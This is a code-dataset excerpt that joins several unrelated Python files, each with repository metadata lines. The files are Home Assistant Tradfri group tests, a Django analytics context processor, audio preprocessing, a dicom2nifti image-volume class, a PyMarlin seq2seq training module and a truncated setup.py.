await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_1", "brightness": 100}, blocking=True, ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_2", "brightness": 100, "transition": 1}, blocking=True, ) await hass.async_block_till_done() group.set_state.assert_called_with(1) group2.set_dimmer.assert_called_with(100) group3.set_dimmer.assert_called_with(100, transition_time=10) async def test_group_turn_off(hass, mock_gateway, mock_api): """Test turning off a group.""" group = mock_group({"state": True}) mock_gateway.mock_groups.append(group) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.async_block_till_done() group.set_state.assert_called_with(0)
0
0
0
6b3c1d8a07e268a18b08211e3dee8a308ba8a690
144
py
Python
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
from texting_wall import settings as django_settings
28.8
65
0.826389
from texting_wall import settings as django_settings def analytics(request): return {'GOOGLE_ANALYTICS': django_settings.GOOGLE_ANALYTICS}
68
0
23
75bbbe94c8482fd95f86698a468a6f4f4f6262de
2,620
py
Python
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
13
2019-04-11T10:02:11.000Z
2021-12-01T22:27:18.000Z
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
2
2019-12-17T13:31:09.000Z
2020-05-14T09:48:10.000Z
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
2
2020-07-17T21:03:18.000Z
2021-07-14T02:09:31.000Z
import random import numpy as np import matplotlib.pyplot as plt import os import pandas as pd import torch from torch.utils.data import DataLoader, Dataset from torch.utils.data.sampler import SubsetRandomSampler import imp from librosa.core import load from librosa.output import write_wav from scipy.io import wavfile from utils import vggish_input imp.reload(vggish_input) def process_wavs_for_training(params): ''' iterates through data under root that must have the structure root/{classes}/{instances}. Data must be in integer(!) .wav format. Under save_to the same subdirectories save_to/{classes} are generated and for every instance vggish compatible inputs are generated according to the parameters specified in vggish_params.py Args: root (string): path to data root saveto (string): path to root where processed data is stored ''' if os.path.exists(params.mel_spec_root): print('spectrograms seem to have been computed') print('delete {} manually and rerun preprocessing or keep goint to use what is there.'.format( params.mel_spec_root)) return labels = os.listdir(params.data_root) for label in os.listdir(params.data_root): if not os.path.isdir(os.path.join(params.data_root, label)): continue print('processing data for label {}'.format(label)) os.makedirs(os.path.join(params.mel_spec_root, label)) for file in os.listdir(os.path.join(params.data_root, label)): data = vggish_input.wavfile_to_examples(os.path.join(params.data_root, label, file)) for i in range(data.shape[0]): np.save(os.path.join(params.mel_spec_root, label, file[:-4]+str(i)+'.npy'), data[i])
39.104478
102
0.695038
import random import numpy as np import matplotlib.pyplot as plt import os import pandas as pd import torch from torch.utils.data import DataLoader, Dataset from torch.utils.data.sampler import SubsetRandomSampler import imp from librosa.core import load from librosa.output import write_wav from scipy.io import wavfile from utils import vggish_input imp.reload(vggish_input) def preprocess(src, dst): y, sr = load(src) y *= 32768 y = y.astype(np.int16) wavfile.write(dst, rate=22050, data=y) def process_wavs_for_training(params): ''' iterates through data under root that must have the structure root/{classes}/{instances}. Data must be in integer(!) .wav format. Under save_to the same subdirectories save_to/{classes} are generated and for every instance vggish compatible inputs are generated according to the parameters specified in vggish_params.py Args: root (string): path to data root saveto (string): path to root where processed data is stored ''' if os.path.exists(params.mel_spec_root): print('spectrograms seem to have been computed') print('delete {} manually and rerun preprocessing or keep goint to use what is there.'.format( params.mel_spec_root)) return labels = os.listdir(params.data_root) for label in os.listdir(params.data_root): if not os.path.isdir(os.path.join(params.data_root, label)): continue print('processing data for label {}'.format(label)) os.makedirs(os.path.join(params.mel_spec_root, label)) for file in os.listdir(os.path.join(params.data_root, label)): data = vggish_input.wavfile_to_examples(os.path.join(params.data_root, label, file)) for i in range(data.shape[0]): np.save(os.path.join(params.mel_spec_root, label, file[:-4]+str(i)+'.npy'), data[i]) def summary(params): labels = [f for f in os.listdir(params.data_root) if os.path.isdir(os.path.join(params.data_root, f))] counts = [len(os.listdir(os.path.join(params.data_root, label))) for label in labels] df = pd.DataFrame(data={'labels':labels, 'instances':counts}) print('the following classes and numer of instances are found:\n') print(df) processed = os.path.exists(params.mel_spec_root) if processed: print('spectrograms for the data seem to have been computed under {} \ and will be used for training'.format(params.mel_spec_root)) else: print('spectrograms for the given data need to be computed by running \ preprocessing')
823
0
46
8ac93b1625af7009e5262f966de85fc5e93bd08d
11,215
py
Python
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
197
2016-04-05T15:24:23.000Z
2022-03-25T17:37:10.000Z
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
102
2017-05-12T07:08:48.000Z
2022-03-22T00:21:54.000Z
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
60
2016-12-13T22:11:56.000Z
2022-03-30T22:55:52.000Z
# -*- coding: utf-8 -*- """ Created on Fri Jun 7 07:40:20 2013 @author: abrys """ # To ignore numpy errors: # pylint: disable=E1101 import nibabel import numpy from dicom2nifti.common import get_nifti_data class Slice(object): """ Class containing all data for a single slice in an image volume """ original_data = None slice_orientation = None class SliceType(object): """ ENUM like container for the slice types """ AXIAL = 1 SAGITTAL = 2 CORONAL = 3 class SliceOrientation(object): """ Class containing the orientation of a slice """ x_component = None y_component = None normal_component = None x_inverted = False y_inverted = False class ImageVolume(object): """ Class representing an imagevolume. You can provide it with a nifti and can be used to get slices in a certain direction It will take the affine matrix into account to find the correct orientation """ def get_slice(self, slice_type, slice_number, time_point=0): """ Returns a slice of the dataset. slice.data contains the window/levelled values, in uint8 slice.original_data contains the original data for this slice :param time_point: in case of 4d nifti the 4th dimension :param slice_number: the slice number :param slice_type: tye slice type (AXIAL, SAGITTAL, CORONAL) """ slice_ = Slice() slice_.slice_number = slice_number # assert that slice_ number is withing the range assert slice_number >= 0 assert slice_number < self._get_number_of_slices(slice_type) slice_data = None if slice_type == SliceType.AXIAL: slice_data = self.__get_raw_slice__(slice_number, self.axial_orientation, time_point) slice_.slice_orientation = self.axial_orientation elif slice_type == SliceType.SAGITTAL: slice_data = self.__get_raw_slice__(slice_number, self.sagittal_orientation, time_point) slice_.slice_orientation = self.sagittal_orientation elif slice_type == SliceType.CORONAL: slice_data = self.__get_raw_slice__(slice_number, self.coronal_orientation, time_point) slice_.slice_orientation = self.coronal_orientation # make a copy of the slice_ so we do not modify the orignal slice_.original_data = slice_data return slice_ def _get_number_of_slices(self, slice_type): """ Get the number of slices in a certain direction """ if slice_type == SliceType.AXIAL: return self.dimensions[self.axial_orientation.normal_component] elif slice_type == SliceType.SAGITTAL: return self.dimensions[self.sagittal_orientation.normal_component] elif slice_type == SliceType.CORONAL: return self.dimensions[self.coronal_orientation.normal_component] def __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z): """ Calculate which is the most likely component for a given direction """ # calculate the x component tx_dot_x = numpy.abs(numpy.dot(transformed_x, [1, 0, 0, 0])) tx_dot_y = numpy.abs(numpy.dot(transformed_x, [0, 1, 0, 0])) tx_dot_z = numpy.abs(numpy.dot(transformed_x, [0, 0, 1, 0])) x_dots = [tx_dot_x, tx_dot_y, tx_dot_z] x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) # calculate the y component ty_dot_x = numpy.abs(numpy.dot(transformed_y, [1, 0, 0, 0])) ty_dot_y = numpy.abs(numpy.dot(transformed_y, [0, 1, 0, 0])) ty_dot_z = numpy.abs(numpy.dot(transformed_y, [0, 0, 1, 0])) y_dots = [ty_dot_x, ty_dot_y, ty_dot_z] y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) # calculate the z component tz_dot_x = numpy.abs(numpy.dot(transformed_z, [1, 0, 0, 0])) tz_dot_y = numpy.abs(numpy.dot(transformed_z, [0, 1, 0, 0])) tz_dot_z = numpy.abs(numpy.dot(transformed_z, [0, 0, 1, 0])) z_dots = [tz_dot_x, tz_dot_y, tz_dot_z] z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) # as long as there are duplicate directions try to correct while x_component == y_component or x_component == z_component or y_component == z_component: if x_component == y_component: # keep the strongest one and change the other if x_max >= y_max: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if x_component == z_component: # keep the strongest one and change the other if x_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if y_component == z_component: # keep the strongest one and change the other if y_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) return x_component, y_component, z_component
45.221774
115
0.659028
# -*- coding: utf-8 -*- """ Created on Fri Jun 7 07:40:20 2013 @author: abrys """ # To ignore numpy errors: # pylint: disable=E1101 import nibabel import numpy from dicom2nifti.common import get_nifti_data class Slice(object): """ Class containing all data for a single slice in an image volume """ original_data = None slice_orientation = None class SliceType(object): """ ENUM like container for the slice types """ AXIAL = 1 SAGITTAL = 2 CORONAL = 3 class SliceOrientation(object): """ Class containing the orientation of a slice """ x_component = None y_component = None normal_component = None x_inverted = False y_inverted = False def load(nifti_file): nifti_image = nibabel.load(nifti_file) return ImageVolume(nifti_image) class ImageVolume(object): """ Class representing an imagevolume. You can provide it with a nifti and can be used to get slices in a certain direction It will take the affine matrix into account to find the correct orientation """ def __init__(self, nifti_image): self.nifti = nifti_image # assert that it is a 3D image self.nifti_data = get_nifti_data(self.nifti).squeeze() if self.nifti_data.ndim == 2: self.nifti_data = numpy.expand_dims(self.nifti_data, 2) if self.nifti_data.ndim != 3: assert self.nifti_data.ndim >= 3 # do some basic processing like setting dimensions and min/max values self.dimensions = self.nifti_data.shape self.axial_orientation = None self.coronal_orientation = None self.sagittal_orientation = None self.__calculate_slice_orientation__() def __calculate_slice_orientation__(self): # Not all image data has the same orientation # We use the affine matrix and multiplying it with one component # of the slice we can find the correct orientation affine_inverse = numpy.linalg.inv(self.nifti.affine) transformed_x = numpy.transpose(numpy.dot(affine_inverse, [[1], [0], [0], [0]]))[0] transformed_y = numpy.transpose(numpy.dot(affine_inverse, [[0], [1], [0], [0]]))[0] transformed_z = numpy.transpose(numpy.dot(affine_inverse, [[0], [0], [1], [0]]))[0] # calculate the most likely x,y,z direction x_component, y_component, z_component = __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z) # Find slice orientiation for the axial size # Find the index of the max component to know which component is the direction in the size self.axial_orientation = SliceOrientation() self.axial_orientation.normal_component = z_component self.axial_orientation.x_component = x_component self.axial_orientation.x_inverted = numpy.sign(transformed_x[self.axial_orientation.x_component]) < 0 self.axial_orientation.y_component = y_component self.axial_orientation.y_inverted = numpy.sign(transformed_y[self.axial_orientation.y_component]) < 0 # Find slice orientiation for the coronal size # Find the index of the max component to know which component is the direction in the size self.coronal_orientation = SliceOrientation() self.coronal_orientation.normal_component = y_component self.coronal_orientation.x_component = x_component self.coronal_orientation.x_inverted = numpy.sign(transformed_x[self.coronal_orientation.x_component]) < 0 self.coronal_orientation.y_component = z_component self.coronal_orientation.y_inverted = numpy.sign(transformed_z[self.coronal_orientation.y_component]) < 0 # Find slice orientation for the sagittal size # Find the index of the max component to know which component is the direction in the size self.sagittal_orientation = SliceOrientation() self.sagittal_orientation.normal_component = x_component self.sagittal_orientation.x_component = y_component self.sagittal_orientation.x_inverted = numpy.sign(transformed_y[self.sagittal_orientation.x_component]) < 0 self.sagittal_orientation.y_component = z_component self.sagittal_orientation.y_inverted = numpy.sign(transformed_z[self.sagittal_orientation.y_component]) < 0 # Assert that the slice normals are not equal assert self.axial_orientation.normal_component != self.coronal_orientation.normal_component assert self.coronal_orientation.normal_component != self.sagittal_orientation.normal_component assert self.sagittal_orientation.normal_component != self.axial_orientation.normal_component def __get_raw_slice__(self, slice_number, slice_orientation, time_point=0): # Take the slice out of one of the timepoints of a 4 d nifti if len(self.nifti_data.shape) >= 4: if slice_orientation.normal_component == 0: slice_data = self.nifti_data[slice_number, :, :, time_point] elif slice_orientation.normal_component == 1: slice_data = self.nifti_data[:, slice_number, :, time_point] else: slice_data = self.nifti_data[:, :, slice_number, time_point] else: if slice_orientation.normal_component == 0: slice_data = self.nifti_data[slice_number, :, :] elif slice_orientation.normal_component == 1: slice_data = self.nifti_data[:, slice_number, :] else: slice_data = self.nifti_data[:, :, slice_number] # If the x_component is larger than the y_component we need to flip # As a consequence of the retrieval of the data the y component can be first # In this case we need to swap x and y if slice_orientation.x_component > slice_orientation.y_component: slice_data = numpy.swapaxes(slice_data, 0, 1) # Flip the numpy direction to display direction (only if needed) # Beware: the left right is actually up down in the image if not slice_orientation.y_inverted: slice_data = numpy.fliplr(slice_data) if not slice_orientation.x_inverted: slice_data = numpy.flipud(slice_data) return slice_data def get_slice(self, slice_type, slice_number, time_point=0): """ Returns a slice of the dataset. slice.data contains the window/levelled values, in uint8 slice.original_data contains the original data for this slice :param time_point: in case of 4d nifti the 4th dimension :param slice_number: the slice number :param slice_type: tye slice type (AXIAL, SAGITTAL, CORONAL) """ slice_ = Slice() slice_.slice_number = slice_number # assert that slice_ number is withing the range assert slice_number >= 0 assert slice_number < self._get_number_of_slices(slice_type) slice_data = None if slice_type == SliceType.AXIAL: slice_data = self.__get_raw_slice__(slice_number, self.axial_orientation, time_point) slice_.slice_orientation = self.axial_orientation elif slice_type == SliceType.SAGITTAL: slice_data = self.__get_raw_slice__(slice_number, self.sagittal_orientation, time_point) slice_.slice_orientation = self.sagittal_orientation elif slice_type == SliceType.CORONAL: slice_data = self.__get_raw_slice__(slice_number, self.coronal_orientation, time_point) slice_.slice_orientation = self.coronal_orientation # make a copy of the slice_ so we do not modify the orignal slice_.original_data = slice_data return slice_ def _get_number_of_slices(self, slice_type): """ Get the number of slices in a certain direction """ if slice_type == SliceType.AXIAL: return self.dimensions[self.axial_orientation.normal_component] elif slice_type == SliceType.SAGITTAL: return self.dimensions[self.sagittal_orientation.normal_component] elif slice_type == SliceType.CORONAL: return self.dimensions[self.coronal_orientation.normal_component] def __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z): """ Calculate which is the most likely component for a given direction """ # calculate the x component tx_dot_x = numpy.abs(numpy.dot(transformed_x, [1, 0, 0, 0])) tx_dot_y = numpy.abs(numpy.dot(transformed_x, [0, 1, 0, 0])) tx_dot_z = numpy.abs(numpy.dot(transformed_x, [0, 0, 1, 0])) x_dots = [tx_dot_x, tx_dot_y, tx_dot_z] x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) # calculate the y component ty_dot_x = numpy.abs(numpy.dot(transformed_y, [1, 0, 0, 0])) ty_dot_y = numpy.abs(numpy.dot(transformed_y, [0, 1, 0, 0])) ty_dot_z = numpy.abs(numpy.dot(transformed_y, [0, 0, 1, 0])) y_dots = [ty_dot_x, ty_dot_y, ty_dot_z] y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) # calculate the z component tz_dot_x = numpy.abs(numpy.dot(transformed_z, [1, 0, 0, 0])) tz_dot_y = numpy.abs(numpy.dot(transformed_z, [0, 1, 0, 0])) tz_dot_z = numpy.abs(numpy.dot(transformed_z, [0, 0, 1, 0])) z_dots = [tz_dot_x, tz_dot_y, tz_dot_z] z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) # as long as there are duplicate directions try to correct while x_component == y_component or x_component == z_component or y_component == z_component: if x_component == y_component: # keep the strongest one and change the other if x_max >= y_max: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if x_component == z_component: # keep the strongest one and change the other if x_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if y_component == z_component: # keep the strongest one and change the other if y_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) return x_component, y_component, z_component
5,355
0
104
6ca5840b2afb8548af45325d440f2ce279a04e57
8,291
py
Python
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
20
2021-06-09T18:46:45.000Z
2022-02-09T01:08:13.000Z
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
50
2021-06-09T17:50:35.000Z
2022-02-07T23:02:30.000Z
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
5
2021-06-21T22:24:30.000Z
2021-12-21T17:08:21.000Z
from typing import List, Dict import torch from pymarlin.core import trainer_backend, module_interface, trainer from torch.utils.data import DataLoader # too long import from pymarlin.utils.stats import global_stats from pymarlin.utils.config_parser.custom_arg_parser import CustomArgParser from pymarlin.utils.distributed import rank_zero_only from pymarlin.utils.logger import getlogger from pymarlin.plugins import PluginModuleInterface from transformers import AutoModelForSeq2SeqLM from torch.optim.lr_scheduler import OneCycleLR import dataclasses from .data_classes import HfSeq2SeqData from .metric_utils import get_metric_func import re from filelock import FileLock try: import nltk NLTK_AVAILABLE = True except (ImportError, ModuleNotFoundError): NLTK_AVAILABLE = False if NLTK_AVAILABLE: with FileLock(".lock") as lock: nltk.download("punkt", quiet=True) @dataclasses.dataclass @dataclasses.dataclass @dataclasses.dataclass if __name__ == "__main__": config = CustomArgParser(yaml_file_arg_key="config_path").parse() print(config) dm = HfSeq2SeqData() dm.setup_datasets(root=config["data_path"]) tm = HfSeq2SeqModule(dm, **config["tm"], generate_kwargs=config["generate"]) TrainerBackendClass = eval("trainer_backend." + config["trainer_backend_class"]) tr = TrainerBackendClass() tr = trainer_backend.DDPTrainerBackend(tr) if config["dist"] else tr tmArgs = trainer.TrainerArguments( **config["tmgr"], stats_args=trainer.stats.StatInitArguments(**config["stat"]), writer_args=trainer.WriterInitArguments(**config["wrt"]), checkpointer_args=trainer.DefaultCheckpointerArguments(**config["chkp"]), ) if config["dist"]: tr = trainer_backend.DDPTrainerBackend(tr) else: tmArgs.distributed_training_args = trainer.DistributedTrainingArguments( local_rank=config["cuda"] ) trainer = trainer.Trainer(trainer_backend=tr, module=tm, args=tmArgs) trainer.validate()
34.260331
102
0.644554
from typing import List, Dict import torch from pymarlin.core import trainer_backend, module_interface, trainer from torch.utils.data import DataLoader # too long import from pymarlin.utils.stats import global_stats from pymarlin.utils.config_parser.custom_arg_parser import CustomArgParser from pymarlin.utils.distributed import rank_zero_only from pymarlin.utils.logger import getlogger from pymarlin.plugins import PluginModuleInterface from transformers import AutoModelForSeq2SeqLM from torch.optim.lr_scheduler import OneCycleLR import dataclasses from .data_classes import HfSeq2SeqData from .metric_utils import get_metric_func import re from filelock import FileLock try: import nltk NLTK_AVAILABLE = True except (ImportError, ModuleNotFoundError): NLTK_AVAILABLE = False if NLTK_AVAILABLE: with FileLock(".lock") as lock: nltk.download("punkt", quiet=True) @dataclasses.dataclass class ModelArguments: encoder_key: str = "bert" num_labels: int = None hf_model: str = "facebook/bart-base" tokenizer_path: str = None model_config_path: str = None model_config_file: str = "config.json" model_path: str = None model_file: str = "pytorch_model.bin" get_latest_ckpt: bool = True @dataclasses.dataclass class GenerateArguments: do_sample: bool = False num_beams: int = 1 length_penalty: float = 1.0 early_stopping: bool = False @dataclasses.dataclass class ModuleInterfaceArguments: max_lr: float = 2e-5 # Maximum learning rate. output_mode: str = "s2s" max_length_encoder: int = 128 max_length_decoder: int = 128 model_args: ModelArguments = ModelArguments() generate_args: GenerateArguments = GenerateArguments() metric: str = "rouge" class HfSeq2SeqModule(PluginModuleInterface): def __init__(self, data: HfSeq2SeqData, args: ModuleInterfaceArguments): super().__init__() self.args = args self.data = data self.auto_setup(AutoModelForSeq2SeqLM) self.logger = getlogger(__name__, log_level="DEBUG") self.metric_func = get_metric_func(self.args.metric) def get_optimizers_schedulers( self, estimated_global_steps_per_epoch: int, epochs: int ): optimizer = torch.optim.Adam(self.model.parameters(), self.args.max_lr) scheduler = OneCycleLR( optimizer, max_lr=self.args.max_lr, steps_per_epoch=estimated_global_steps_per_epoch, epochs=epochs, anneal_strategy="linear", ) self.schedulers = scheduler return [optimizer], [scheduler] def get_train_dataloader(self, sampler: torch.utils.data.Sampler, batch_size: int): train_ds = self.data.get_train_dataset() dl = DataLoader( train_ds, batch_size=batch_size, collate_fn=self.collate_fun, sampler=sampler(train_ds), ) return dl def get_val_dataloaders(self, sampler: torch.utils.data.Sampler, batch_size: int): val_ds = self.data.get_val_dataset() dl = DataLoader( val_ds, batch_size=batch_size, collate_fn=self.collate_fun, sampler=sampler(val_ds), ) return dl def collate_fun(self, batch): source, target = torch.utils.data._utils.collate.default_collate(batch) # this is probably truncating. repeat positional embeddings and increase embedding layer size. source_tokens = self.tokenizer( list(source), padding=True, truncation=True, return_tensors="pt", max_length=self.args.max_length_encoder, ) target_tokens = self.tokenizer( list(target), padding=True, truncation=True, return_tensors="pt", max_length=self.args.max_length_decoder, ) labels = target_tokens["input_ids"] labels[labels[:, :] == self.model.config.pad_token_id] = -100 source_tokens["labels"] = labels return source_tokens def train_step(self, global_step: int, batch, device): batch = batch.to(device) result = self.model.forward(**batch) global_stats.update("lr", self.schedulers.get_last_lr()[0], frequent=True) return result.loss def val_step(self, global_step: int, batch, device): self.logger.debug("inside val_step") batch = batch.to(device) # result = self.model.forward(**batch) self.logger.debug("pre-generate") outputs = self.model.generate( input_ids=batch.input_ids, attention_mask=batch.attention_mask, max_length=self.args.max_length_decoder, **dataclasses.asdict(self.args.generate_args), ) self.logger.debug("post-generate") labels = batch.labels self.logger.debug("pre-pad") labels = self._pad(labels, device) outputs = self._pad(outputs, device) self.logger.debug("post-pad") # print('output size', outputs.size()) # print('label size', labels.size()) self.logger.debug("returning...") return outputs, labels def _pad(self, outputs, device, max_len=None): padded_outputs = [] if max_len is None: max_len = self.args.max_length_decoder for output in outputs: # print('unpadded size', output.size()) padding = torch.tensor( (max_len - len(output)) * [self.tokenizer.pad_token_id] ).to(device) padded = torch.cat([output, padding]) # print('padded.size()',padded.size()) padded_outputs.append(padded) return torch.stack(padded_outputs) @rank_zero_only def on_end_val_epoch(self, global_step, *collated_output, key="default"): # move all batch decoding to here so that we can collate tensors in DDP self.logger.debug("inside on_end_val_epoch") outputs, labels = collated_output labels[labels[:, :] == -100] = self.model.config.pad_token_id self.logger.debug("pre-decode") preds, refs = [], [] for output, label in zip(outputs, labels): try: pred = self.tokenizer.decode( output, skip_special_tokens=True, clean_up_tokenization_spaces=True ) ref = self.tokenizer.decode( label, skip_special_tokens=True, clean_up_tokenization_spaces=True ) preds.append(pred) refs.append(ref) except Exception as e: self.logger.debug("hit decoding exception") self.logger.debug(e) self.logger.debug("post-decode") self.logger.debug(f"len(preds): {len(preds)}") self.logger.debug(f"len(refs): {len(refs)}") if len(preds) > 0: self.logger.debug(f"preds[0]: {preds[0]}") if len(refs) > 0: self.logger.debug(f"refs[0]: {refs[0]}") metrics = self.metric_func(preds, refs) for k in metrics: global_stats.update(key + "/val_" + k, metrics[k]) if __name__ == "__main__": config = CustomArgParser(yaml_file_arg_key="config_path").parse() print(config) dm = HfSeq2SeqData() dm.setup_datasets(root=config["data_path"]) tm = HfSeq2SeqModule(dm, **config["tm"], generate_kwargs=config["generate"]) TrainerBackendClass = eval("trainer_backend." + config["trainer_backend_class"]) tr = TrainerBackendClass() tr = trainer_backend.DDPTrainerBackend(tr) if config["dist"] else tr tmArgs = trainer.TrainerArguments( **config["tmgr"], stats_args=trainer.stats.StatInitArguments(**config["stat"]), writer_args=trainer.WriterInitArguments(**config["wrt"]), checkpointer_args=trainer.DefaultCheckpointerArguments(**config["chkp"]), ) if config["dist"]: tr = trainer_backend.DDPTrainerBackend(tr) else: tmArgs.distributed_training_args = trainer.DistributedTrainingArguments( local_rank=config["cuda"] ) trainer = trainer.Trainer(trainer_backend=tr, module=tm, args=tmArgs) trainer.validate()
5,156
1,006
89
31e188b24e477c5a5d5c14f9c92fc0e596b84bcc
6,565
py
Python
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
6
2021-01-25T15:21:31.000Z
2022-03-07T09:23:37.000Z
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
3
2020-12-30T16:21:42.000Z
2022-03-07T09:23:18.000Z
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
null
null
null
import os import re import sys import platform import subprocess import fnmatch import shutil from setuptools import setup, Extension, find_packages from setuptools.command.build_ext import build_ext import setuptools.command.build_py from distutils.version import LooseVersion from ctypes.util import find_library version = '0.5.' vrs_sub = '0' if os.environ.get('CI_PIPELINE_IID'): ci_id = os.environ['CI_PIPELINE_IID'] if (isinstance(ci_id, str) and len(ci_id)>0) or isinstance(ci_id, int): vrs_sub = ci_id version = version + vrs_sub source_dir= os.path.abspath('../../') build_dir= os.path.abspath('../../build_py') PLATFORM = get_platform() REDISTR_LIBS = [] if PLATFORM=='Windows': REDISTR_LIBS = [ 'concrt140.dll', 'msvcp140.dll', 'msvcp140_1.dll', 'msvcp140_2.dll', 'msvcp140_codecvt_ids.dll', 'vccorlib140.dll', 'vcruntime140.dll', 'vcruntime140_1.dll'] # Get the long description from the README file here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() # Get requirements from requirements-dev.txt file with open(os.path.join(here, 'requirements-dev.txt')) as f: requirements_dev = f.read().replace('==', '>=').splitlines() setup( name='slideio', version=version, author='Stanislav Melnikov, Vadim Popov', author_email='stanislav.melnikov@gmail.com', description='Reading of medical images', long_description=long_description, ext_modules=[CMakeExtension(name = 'slideio', source_dir=source_dir, build_dir=build_dir)], cmdclass=dict(build_ext=CMakeBuild), packages=find_packages(), project_urls={ 'Documentation':'http://slideio.com', "Source Code": "https://gitlab.com/bioslide/slideio.git" }, keywords = 'images, pathology, tissue, medical, czi, svs, afi, scn', package_data={}, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Bio-Informatics', 'Topic :: Scientific/Engineering :: Image Recognition', 'Topic :: Scientific/Engineering :: Medical Science Apps.', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], install_requires=['numpy'], extras_require={}, data_files=[( '.', [ 'requirements-dev.txt' ] )], zip_safe=False, )
32.181373
95
0.585986
import os import re import sys import platform import subprocess import fnmatch import shutil from setuptools import setup, Extension, find_packages from setuptools.command.build_ext import build_ext import setuptools.command.build_py from distutils.version import LooseVersion from ctypes.util import find_library version = '0.5.' vrs_sub = '0' if os.environ.get('CI_PIPELINE_IID'): ci_id = os.environ['CI_PIPELINE_IID'] if (isinstance(ci_id, str) and len(ci_id)>0) or isinstance(ci_id, int): vrs_sub = ci_id version = version + vrs_sub source_dir= os.path.abspath('../../') build_dir= os.path.abspath('../../build_py') def get_platform(): platforms = { 'linux' : 'Linux', 'linux1' : 'Linux', 'linux2' : 'Linux', 'darwin' : 'Macos', 'win32' : 'Windows' } if sys.platform not in platforms: return sys.platform return platforms[sys.platform] PLATFORM = get_platform() REDISTR_LIBS = [] if PLATFORM=='Windows': REDISTR_LIBS = [ 'concrt140.dll', 'msvcp140.dll', 'msvcp140_1.dll', 'msvcp140_2.dll', 'msvcp140_codecvt_ids.dll', 'vccorlib140.dll', 'vcruntime140.dll', 'vcruntime140_1.dll'] def find_shared_libs(dir, pattern): matches = [] for root, dirnames, filenames in os.walk(dir): for filename in fnmatch.filter(filenames, pattern): matches.append(os.path.join(root, filename)) return matches # Get the long description from the README file here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() # Get requirements from requirements-dev.txt file with open(os.path.join(here, 'requirements-dev.txt')) as f: requirements_dev = f.read().replace('==', '>=').splitlines() class 